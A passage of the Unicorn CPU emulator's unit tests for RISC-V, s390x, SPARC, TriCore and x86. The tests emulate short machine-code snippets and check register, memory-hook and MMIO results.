li t1, 0x16000 sw t0, 0(t1) nop */ char code_s[] = "\xb7\x42\x41\x41" "\x9b\x82\x12\x14" "\x37\x63\x01\x00" "\x23\x20\x53\x00" "\x13\x00\x00\x00"; OK(uc_open(UC_ARCH_RISCV, UC_MODE_RISCV64, &uc)); OK(uc_ctl_tlb_mode(uc, UC_TLB_CPU)); OK(uc_hook_add(uc, &h, UC_HOOK_CODE, test_riscv_mmu_hook_code, NULL, 1, 0)); OK(uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL)); OK(uc_mem_map(uc, code_address, 0x1000, UC_PROT_ALL)); OK(uc_mem_map(uc, data_address, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, code_address, &code_s, sizeof(code_s))); OK(uc_mem_write(uc, 0x1000, &code_m, sizeof(code_m))); test_riscv_mmu_prepare_tlb(uc, data_address, code_address); OK(uc_emu_start(uc, 0x1000, sizeof(code_m) - 1, 0, 0)); OK(uc_mem_read(uc, data_address, &data_result, sizeof(data_result))); TEST_CHECK(data_value == data_result); } TEST_LIST = { {"test_riscv32_nop", test_riscv32_nop}, {"test_riscv64_nop", test_riscv64_nop}, {"test_riscv32_3steps_pc_update", test_riscv32_3steps_pc_update}, {"test_riscv64_3steps_pc_update", test_riscv64_3steps_pc_update}, {"test_riscv32_until_pc_update", test_riscv32_until_pc_update}, {"test_riscv64_until_pc_update", test_riscv64_until_pc_update}, {"test_riscv32_fp_move", test_riscv32_fp_move}, {"test_riscv64_fp_move", test_riscv64_fp_move}, {"test_riscv64_fp_move_from_int", test_riscv64_fp_move_from_int}, {"test_riscv64_fp_move_from_int_reg_write", test_riscv64_fp_move_from_int_reg_write}, {"test_riscv64_fp_move_to_int", test_riscv64_fp_move_to_int}, {"test_riscv64_ecall", test_riscv64_ecall}, {"test_riscv32_mmio_map", test_riscv32_mmio_map}, {"test_riscv64_mmio_map", test_riscv64_mmio_map}, 
{"test_riscv32_map", test_riscv32_map}, {"test_riscv64_code_patching", test_riscv64_code_patching}, {"test_riscv64_code_patching_count", test_riscv64_code_patching_count}, {"test_riscv_correct_address_in_small_jump_hook", test_riscv_correct_address_in_small_jump_hook}, {"test_riscv_correct_address_in_long_jump_hook", test_riscv_correct_address_in_long_jump_hook}, {"test_riscv_mmu", test_riscv_mmu}, {NULL, NULL}}; ���������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/test_s390x.c���������������������������������������������������������������0000664�0000000�0000000�00000002006�14675241067�0017414�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size) { OK(uc_open(arch, mode, uc)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } static void test_s390x_lr(void) { char code[] = "\x18\x23"; // lr %r2, %r3 uint64_t r_pc, r_r2, r_r3 = 0x114514; uc_engine *uc; uc_common_setup(&uc, UC_ARCH_S390X, UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_S390X_REG_R3, &r_r3)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_S390X_REG_R2, &r_r2)); OK(uc_reg_read(uc, UC_S390X_REG_PC, &r_pc)); TEST_CHECK(r_r2 == 0x114514); TEST_CHECK(r_pc == code_start + sizeof(code) - 1); OK(uc_close(uc)); } TEST_LIST = {{"test_s390x_lr", test_s390x_lr}, {NULL, NULL}}; ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/test_sparc.c���������������������������������������������������������������0000664�0000000�0000000�00000000175�14675241067�0017643�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; TEST_LIST = {{NULL, 
NULL}};
unicorn-2.1.1/tests/unit/test_tricore.c
#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; TEST_LIST = {{NULL, NULL}};
unicorn-2.1.1/tests/unit/test_x86.c
#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; #define MEM_BASE 0x40000000 #define MEM_SIZE 1024 * 1024 #define MEM_STACK MEM_BASE + (MEM_SIZE / 2) #define MEM_TEXT MEM_STACK + 4096 static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size) { OK(uc_open(arch, mode, uc)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } typedef struct RegInfo_t { const char *file; int line; const char *name; uc_x86_reg reg; uint64_t value; } RegInfo; typedef struct QuickTest_t { uc_mode mode; uint8_t *code_data; size_t code_size; size_t in_count; RegInfo in_regs[32]; size_t out_count; RegInfo out_regs[32]; } QuickTest; static void QuickTest_run(QuickTest *test) { uc_engine *uc; // initialize the emulator in the requested x86 mode OK(uc_open(UC_ARCH_X86, test->mode, &uc)); // map 1MB of memory for this emulation OK(uc_mem_map(uc, MEM_BASE, MEM_SIZE, UC_PROT_ALL)); OK(uc_mem_write(uc, MEM_TEXT, test->code_data, test->code_size)); if (test->mode == UC_MODE_64) { uint64_t stack_top = MEM_STACK; OK(uc_reg_write(uc, UC_X86_REG_RSP, &stack_top)); } else { uint32_t stack_top = MEM_STACK; OK(uc_reg_write(uc, UC_X86_REG_ESP, &stack_top)); } for (size_t i = 0; i < test->in_count; i++) { OK(uc_reg_write(uc, test->in_regs[i].reg, &test->in_regs[i].value)); } OK(uc_emu_start(uc, MEM_TEXT, MEM_TEXT + test->code_size, 0, 0)); for (size_t i = 0; i < test->out_count; i++) { RegInfo *out = &test->out_regs[i]; if (test->mode == UC_MODE_64) { uint64_t value = 0; OK(uc_reg_read(uc, out->reg, &value));
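// Compare against the expected value, reporting failures at the file/line captured when TEST_OUT_REG recorded the expectation.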
acutest_check_(value == out->value, out->file, out->line, "OUT_REG(%s, 0x%llX) = 0x%llX", out->name, out->value, value); } else { uint32_t value = 0; OK(uc_reg_read(uc, out->reg, &value)); acutest_check_(value == (uint32_t)out->value, out->file, out->line, "OUT_REG(%s, 0x%X) = 0x%X", out->name, (uint32_t)out->value, value); } } OK(uc_mem_unmap(uc, MEM_BASE, MEM_SIZE)); OK(uc_close(uc)); } #define TEST_CODE(MODE, CODE) \ QuickTest t; \ memset(&t, 0, sizeof(t)); \ t.mode = MODE; \ t.code_data = CODE; \ t.code_size = sizeof(CODE) #define TEST_IN_REG(NAME, VALUE) \ t.in_regs[t.in_count].file = __FILE__; \ t.in_regs[t.in_count].line = __LINE__; \ t.in_regs[t.in_count].name = #NAME; \ t.in_regs[t.in_count].reg = UC_X86_REG_##NAME; \ t.in_regs[t.in_count].value = VALUE; \ t.in_count++ #define TEST_OUT_REG(NAME, VALUE) \ t.out_regs[t.out_count].file = __FILE__; \ t.out_regs[t.out_count].line = __LINE__; \ t.out_regs[t.out_count].name = #NAME; \ t.out_regs[t.out_count].reg = UC_X86_REG_##NAME; \ t.out_regs[t.out_count].value = VALUE; \ t.out_count++ #define TEST_RUN() QuickTest_run(&t) typedef struct _INSN_IN_RESULT { uint32_t port; int size; } INSN_IN_RESULT; static void test_x86_in_callback(uc_engine *uc, uint32_t port, int size, void *user_data) { INSN_IN_RESULT *result = (INSN_IN_RESULT *)user_data; result->port = port; result->size = size; } static void test_x86_in(void) { uc_engine *uc; uc_hook hook; char code[] = "\xe5\x10"; // IN eax, 0x10 INSN_IN_RESULT result; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hook, UC_HOOK_INSN, test_x86_in_callback, &result, 1, 0, UC_X86_INS_IN)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); TEST_CHECK(result.port == 0x10); TEST_CHECK(result.size == 4); OK(uc_hook_del(uc, hook)); OK(uc_close(uc)); } typedef struct _INSN_OUT_RESULT { uint32_t port; int size; uint32_t value; } INSN_OUT_RESULT; static void test_x86_out_callback(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data) { INSN_OUT_RESULT *result = (INSN_OUT_RESULT *)user_data; result->port = port; result->size = size; result->value = value; } static void test_x86_out(void) { uc_engine *uc; uc_hook hook; char code[] = "\xb0\x32\xe6\x46"; // MOV al, 0x32; OUT 0x46, al; INSN_OUT_RESULT result; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hook, UC_HOOK_INSN, test_x86_out_callback, &result, 1, 0, UC_X86_INS_OUT)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); TEST_CHECK(result.port == 0x46); TEST_CHECK(result.size == 1); TEST_CHECK(result.value == 0x32); OK(uc_hook_del(uc, hook)); OK(uc_close(uc)); } typedef struct _MEM_HOOK_RESULT { uc_mem_type type; uint64_t address; int size; uint64_t value; } MEM_HOOK_RESULT; typedef struct _MEM_HOOK_RESULTS { uint64_t count; MEM_HOOK_RESULT results[16]; } MEM_HOOK_RESULTS; static bool test_x86_mem_hook_all_callback(uc_engine *uc, uc_mem_type type, uint64_t address, int size, uint64_t value, void *user_data) { MEM_HOOK_RESULTS *r = (MEM_HOOK_RESULTS *)user_data; uint64_t count = r->count; if (count >= 16) { TEST_ASSERT(false); } r->results[count].type = type; r->results[count].address = address; r->results[count].size = size; r->results[count].value = value; r->count++; if (type == UC_MEM_READ_UNMAPPED) { uc_mem_map(uc, address, 0x1000, UC_PROT_ALL); } return true; } static void test_x86_mem_hook_all(void) { uc_engine *uc; uc_hook hook; // mov eax, 0xdeadbeef; // mov [0x8000], eax; // mov eax, [0x10000]; char 
code[] = "\xb8\xef\xbe\xad\xde\xa3\x00\x80\x00\x00\xa1\x00\x00\x01\x00"; MEM_HOOK_RESULTS r = {0}; MEM_HOOK_RESULT expects[3] = {{UC_MEM_WRITE, 0x8000, 4, 0xdeadbeef}, {UC_MEM_READ_UNMAPPED, 0x10000, 4, 0}, {UC_MEM_READ, 0x10000, 4, 0}}; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_mem_map(uc, 0x8000, 0x1000, UC_PROT_ALL)); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_VALID | UC_HOOK_MEM_INVALID, test_x86_mem_hook_all_callback, &r, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); TEST_CHECK(r.count == 3); for (int i = 0; i < r.count; i++) { TEST_CHECK(expects[i].type == r.results[i].type); TEST_CHECK(expects[i].address == r.results[i].address); TEST_CHECK(expects[i].size == r.results[i].size); TEST_CHECK(expects[i].value == r.results[i].value); } OK(uc_hook_del(uc, hook)); OK(uc_close(uc)); } static void test_x86_inc_dec_pxor(void) { uc_engine *uc; char code[] = "\x41\x4a\x66\x0f\xef\xc1"; // INC ecx; DEC edx; PXOR xmm0, xmm1 int r_ecx = 0x1234; int r_edx = 0x7890; uint64_t r_xmm0[2] = {0x08090a0b0c0d0e0f, 0x0001020304050607}; uint64_t r_xmm1[2] = {0x8090a0b0c0d0e0f0, 0x0010203040506070}; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); OK(uc_reg_write(uc, UC_X86_REG_XMM0, &r_xmm0)); OK(uc_reg_write(uc, UC_X86_REG_XMM1, &r_xmm1)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); OK(uc_reg_read(uc, UC_X86_REG_XMM0, &r_xmm0)); TEST_CHECK(r_ecx == 0x1235); TEST_CHECK(r_edx == 0x788f); TEST_CHECK(r_xmm0[0] == 0x8899aabbccddeeff); TEST_CHECK(r_xmm0[1] == 0x0011223344556677); OK(uc_close(uc)); } static void test_x86_relative_jump(void) { uc_engine *uc; char code[] = "\xeb\x02\x90\x90\x90\x90\x90\x90"; // jmp 4; nop; nop; nop; // nop; nop; nop int r_eip; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_emu_start(uc, code_start, code_start + 4, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EIP, &r_eip)); TEST_CHECK(r_eip == code_start + 4); OK(uc_close(uc)); } static void test_x86_loop(void) { uc_engine *uc; char code[] = "\x41\x4a\xeb\xfe"; // inc ecx; dec edx; jmp $; int r_ecx = 0x1234; int r_edx = 0x7890; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 1 * 1000000, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_ecx == 0x1235); TEST_CHECK(r_edx == 0x788f); OK(uc_close(uc)); } static void test_x86_invalid_mem_read(void) { uc_engine *uc; char code[] = "\x8b\x0d\xaa\xaa\xaa\xaa"; // mov ecx, [0xAAAAAAAA] uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); uc_assert_err( UC_ERR_READ_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static void test_x86_invalid_mem_write(void) { uc_engine *uc; char code[] = "\x89\x0d\xaa\xaa\xaa\xaa"; // mov ecx, [0xAAAAAAAA] uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); uc_assert_err( UC_ERR_WRITE_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static void test_x86_invalid_jump(void) { uc_engine *uc; char code[] = "\xe9\xe9\xee\xee\xee"; // jmp 0xEEEEEEEE uc_common_setup(&uc, UC_ARCH_X86, 
UC_MODE_32, code, sizeof(code) - 1); uc_assert_err( UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static void test_x86_64_syscall_callback(uc_engine *uc, void *user_data) { uint64_t rax; OK(uc_reg_read(uc, UC_X86_REG_RAX, &rax)); TEST_CHECK(rax == 0x100); } static void test_x86_64_syscall(void) { uc_engine *uc; uc_hook hook; char code[] = "\x0f\x05"; // syscall uint64_t r_rax = 0x100; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_RAX, &r_rax)); OK(uc_hook_add(uc, &hook, UC_HOOK_INSN, test_x86_64_syscall_callback, NULL, 1, 0, UC_X86_INS_SYSCALL)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_hook_del(uc, hook)); OK(uc_close(uc)); } static void test_x86_16_add(void) { uc_engine *uc; char code[] = "\x00\x00"; // add byte ptr [bx + si], al uint16_t r_ax = 7; uint16_t r_bx = 5; uint16_t r_si = 6; uint8_t result; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_16, code, sizeof(code) - 1); OK(uc_mem_map(uc, 0, 0x1000, UC_PROT_ALL)); OK(uc_reg_write(uc, UC_X86_REG_AX, &r_ax)); OK(uc_reg_write(uc, UC_X86_REG_BX, &r_bx)); OK(uc_reg_write(uc, UC_X86_REG_SI, &r_si)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, r_bx + r_si, &result, 1)); TEST_CHECK(result == 7); OK(uc_close(uc)); } static void test_x86_reg_save(void) { uc_engine *uc; uc_context *ctx; char code[] = "\x40"; // inc eax int r_eax = 1; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_context_alloc(uc, &ctx)); OK(uc_context_save(uc, ctx)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EAX, &r_eax)); TEST_CHECK(r_eax == 2); OK(uc_context_restore(uc, ctx)); OK(uc_reg_read(uc, UC_X86_REG_EAX, &r_eax)); TEST_CHECK(r_eax == 1); OK(uc_context_free(ctx)); OK(uc_close(uc)); } static bool test_x86_invalid_mem_read_stop_in_cb_callback(uc_engine *uc, uc_mem_type type, uint64_t address, int size, uint64_t value, void *user_data) { // False indicates that we fail to handle this ERROR and let the emulation // stop. // // Note that the memory must be mapped properly if we return true! Check // test_x86_mem_hook_all for example. return false; } static void test_x86_invalid_mem_read_stop_in_cb(void) { uc_engine *uc; uc_hook hook; char code[] = "\x40\x8b\x1d\x00\x00\x10\x00\x42"; // inc eax; mov ebx, // [0x100000]; inc edx int r_eax = 0x1234; int r_edx = 0x5678; int r_eip = 0; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_READ, test_x86_invalid_mem_read_stop_in_cb_callback, NULL, 1, 0)); OK(uc_reg_write(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); uc_assert_err( UC_ERR_READ_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); // The state of Unicorn should be correct at this time. OK(uc_reg_read(uc, UC_X86_REG_EIP, &r_eip)); OK(uc_reg_read(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_eip == code_start + 1); TEST_CHECK(r_eax == 0x1235); TEST_CHECK(r_edx == 0x5678); OK(uc_close(uc)); } static void test_x86_x87_fnstenv_callback(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { uint32_t r_eip; uint32_t r_eax; uint32_t fnstenv[7]; if (address == code_start + 4) { // The first fnstenv executed // Save the address of the fld. 
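// (A UC_HOOK_CODE callback fires before its instruction executes, so EIP here is the address of the fld itself.)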
OK(uc_reg_read(uc, UC_X86_REG_EIP, &r_eip)); *((uint32_t *)user_data) = r_eip; OK(uc_reg_read(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_mem_read(uc, r_eax, fnstenv, sizeof(fnstenv))); // Don't update FCS:FIP for fnop. TEST_CHECK(fnstenv[3] == 0); } } static void test_x86_x87_fnstenv(void) { uc_engine *uc; uc_hook hook; char code[] = "\xd9\xd0\xd9\x30\xd9\x00\xd9\x30"; // fnop;fnstenv [eax];fld dword ptr // [eax];fnstenv [eax] uint32_t base = code_start + 3 * code_len; uint32_t last_eip; uint32_t fnstenv[7]; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_mem_map(uc, base, code_len, UC_PROT_ALL)); OK(uc_reg_write(uc, UC_X86_REG_EAX, &base)); OK(uc_hook_add(uc, &hook, UC_HOOK_CODE, test_x86_x87_fnstenv_callback, &last_eip, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, base, fnstenv, sizeof(fnstenv))); // But update FCS:FIP for fld. TEST_CHECK(LEINT32(fnstenv[3]) == last_eip); OK(uc_close(uc)); } static uint64_t test_x86_mmio_read_callback(uc_engine *uc, uint64_t offset, unsigned size, void *user_data) { TEST_CHECK(offset == 4); TEST_CHECK(size == 4); return 0x19260817; } static void test_x86_mmio_write_callback(uc_engine *uc, uint64_t offset, unsigned size, uint64_t value, void *user_data) { TEST_CHECK(offset == 4); TEST_CHECK(size == 4); TEST_CHECK(value == 0xdeadbeef); return; } static void test_x86_mmio(void) { uc_engine *uc; int r_ecx = 0xdeadbeef; char code[] = "\x89\x0d\x04\x00\x02\x00\x8b\x0d\x04\x00\x02\x00"; // mov [0x20004], // ecx; mov ecx, // [0x20004] uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_mmio_map(uc, 0x20000, 0x1000, test_x86_mmio_read_callback, NULL, test_x86_mmio_write_callback, NULL)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); TEST_CHECK(r_ecx == 0x19260817); OK(uc_close(uc)); } static bool test_x86_missing_code_callback(uc_engine *uc, uc_mem_type type, uint64_t address, int size, uint64_t value, void *user_data) { char code[] = "\x41\x4a"; // inc ecx; dec edx; uint64_t aligned_address = address & 0xFFFFFFFFFFFFF000ULL; int aligned_size = ((int)(size / 0x1000) + 1) * 0x1000; OK(uc_mem_map(uc, aligned_address, aligned_size, UC_PROT_ALL)); OK(uc_mem_write(uc, aligned_address, code, sizeof(code) - 1)); return true; } static void test_x86_missing_code(void) { uc_engine *uc; uc_hook hook; int r_ecx = 0x1234; int r_edx = 0x7890; // Don't write any code by design.
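// The UC_HOOK_MEM_UNMAPPED callback above maps a fresh page and supplies "inc ecx; dec edx" on demand, so emulation can start from entirely empty memory.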
OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_UNMAPPED, test_x86_missing_code_callback, NULL, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + 2, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_ecx == 0x1235); TEST_CHECK(r_edx == 0x788f); OK(uc_close(uc)); } static void test_x86_smc_xor(void) { uc_engine *uc; /* * 0x1000 xor dword ptr [edi+0x3], eax ; edi=0x1000, eax=0xbc4177e6 * 0x1003 dw 0x3ea98b13 */ char code[] = "\x31\x47\x03\x13\x8b\xa9\x3e"; int r_edi = code_start; int r_eax = 0xbc4177e6; uint32_t result; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); uc_reg_write(uc, UC_X86_REG_EDI, &r_edi); uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); OK(uc_emu_start(uc, code_start, code_start + 3, 0, 0)); OK(uc_mem_read(uc, code_start + 3, (void *)&result, 4)); TEST_CHECK(LEINT32(result) == (0x3ea98b13 ^ 0xbc4177e6)); OK(uc_close(uc)); } static uint64_t test_x86_mmio_uc_mem_rw_read_callback(uc_engine *uc, uint64_t offset, unsigned size, void *user_data) { TEST_CHECK(offset == 8); TEST_CHECK(size == 4); return 0x19260817; } static void test_x86_mmio_uc_mem_rw_write_callback(uc_engine *uc, uint64_t offset, unsigned size, uint64_t value, void *user_data) { TEST_CHECK(offset == 4); TEST_CHECK(size == 4); TEST_CHECK(value == 0xdeadbeef); return; } static void test_x86_mmio_uc_mem_rw(void) { uc_engine *uc; int data = LEINT32(0xdeadbeef); OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_mmio_map(uc, 0x20000, 0x1000, test_x86_mmio_uc_mem_rw_read_callback, NULL, test_x86_mmio_uc_mem_rw_write_callback, NULL)); OK(uc_mem_write(uc, 0x20004, (void *)&data, 4)); OK(uc_mem_read(uc, 0x20008, (void *)&data, 4)); TEST_CHECK(LEINT32(data) == 0x19260817); OK(uc_close(uc)); } static void test_x86_sysenter_hook(uc_engine *uc, void *user) { *(int *)user = 1; } static void test_x86_sysenter(void) { uc_engine *uc; char code[] = "\x0F\x34"; // sysenter uc_hook h; int called = 0; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &h, UC_HOOK_INSN, test_x86_sysenter_hook, &called, 1, 0, UC_X86_INS_SYSENTER)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); TEST_CHECK(called == 1); OK(uc_close(uc)); } static int test_x86_hook_cpuid_callback(uc_engine *uc, void *data) { int reg = 7; OK(uc_reg_write(uc, UC_X86_REG_EAX, ®)); // Overwrite the cpuid instruction. 
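// Returning non-zero makes Unicorn skip the real CPUID, so EAX keeps the value written above.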
return 1; } static void test_x86_hook_cpuid(void) { uc_engine *uc; char code[] = "\x40\x0F\xA2"; // INC EAX; CPUID uc_hook h; int reg; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &h, UC_HOOK_INSN, test_x86_hook_cpuid_callback, NULL, 1, 0, UC_X86_INS_CPUID)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EAX, ®)); TEST_CHECK(reg == 7); OK(uc_close(uc)); } static void test_x86_486_cpuid(void) { uc_engine *uc; uint32_t eax; uint32_t ebx; char code[] = {0x31, 0xC0, 0x0F, 0xA2}; // XOR EAX EAX; CPUID OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_ctl_set_cpu_model(uc, UC_CPU_X86_486)); OK(uc_mem_map(uc, 0, 4 * 1024, UC_PROT_ALL)); OK(uc_mem_write(uc, 0, code, sizeof(code) / sizeof(code[0]))); OK(uc_emu_start(uc, 0, sizeof(code) / sizeof(code[0]), 0, 0)); /* Read eax after emulation */ OK(uc_reg_read(uc, UC_X86_REG_EAX, &eax)); OK(uc_reg_read(uc, UC_X86_REG_EBX, &ebx)); TEST_CHECK(eax != 0); TEST_CHECK(ebx == 0x756e6547); // magic string "Genu" for intel cpu OK(uc_close(uc)); } // This is a regression bug. static void test_x86_clear_tb_cache(void) { uc_engine *uc; char code[] = "\x83\xc1\x01\x4a"; // ADD ecx, 1; DEC edx; int r_ecx = 0x1234; int r_edx = 0x7890; uint64_t code_start = 0x1240; // Choose this address by design uint64_t code_len = 0x1000; OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_mem_map(uc, code_start & (1 << 12), code_len, UC_PROT_ALL)); OK(uc_mem_write(uc, code_start, code, sizeof(code))); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); // This emulation should take no effect at all. OK(uc_emu_start(uc, code_start, code_start, 0, 0)); // Emulate ADD ecx, 1. OK(uc_emu_start(uc, code_start, code_start + 3, 0, 0)); // If tb cache is not cleared, edx would be still 0x7890 OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_ecx == 0x1236); TEST_CHECK(r_edx == 0x788f); OK(uc_close(uc)); } static void test_x86_clear_count_cache(void) { uc_engine *uc; // uc_emu_start will clear last TB when exiting so generating a tb at last // by design char code[] = "\x83\xc1\x01\x4a\xeb\x00\x83\xc3\x01"; // ADD ecx, 1; DEC edx; // jmp t; // t: // ADD ebx, 1 int r_ecx = 0x1234; int r_edx = 0x7890; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 2)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_ecx == 0x1236); TEST_CHECK(r_edx == 0x788e); OK(uc_close(uc)); } // This is a regression bug. static void test_x86_clear_empty_tb(void) { uc_engine *uc; // lb: // add ecx, 1; // cmp ecx, 0; // jz lb; // dec edx; char code[] = "\x83\xc1\x01\x83\xf9\x00\x74\xf8\x4a"; int r_edx = 0x7890; uint64_t code_start = 0x1240; // Choose this address by design uint64_t code_len = 0x1000; OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_mem_map(uc, code_start & (1 << 12), code_len, UC_PROT_ALL)); OK(uc_mem_write(uc, code_start, code, sizeof(code))); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); // Make sure we generate an empty tb at the exit address by stopping at dec // edx. 
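// Offset 8 is the dec edx, so this first run stops right before it and leaves edx untouched.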
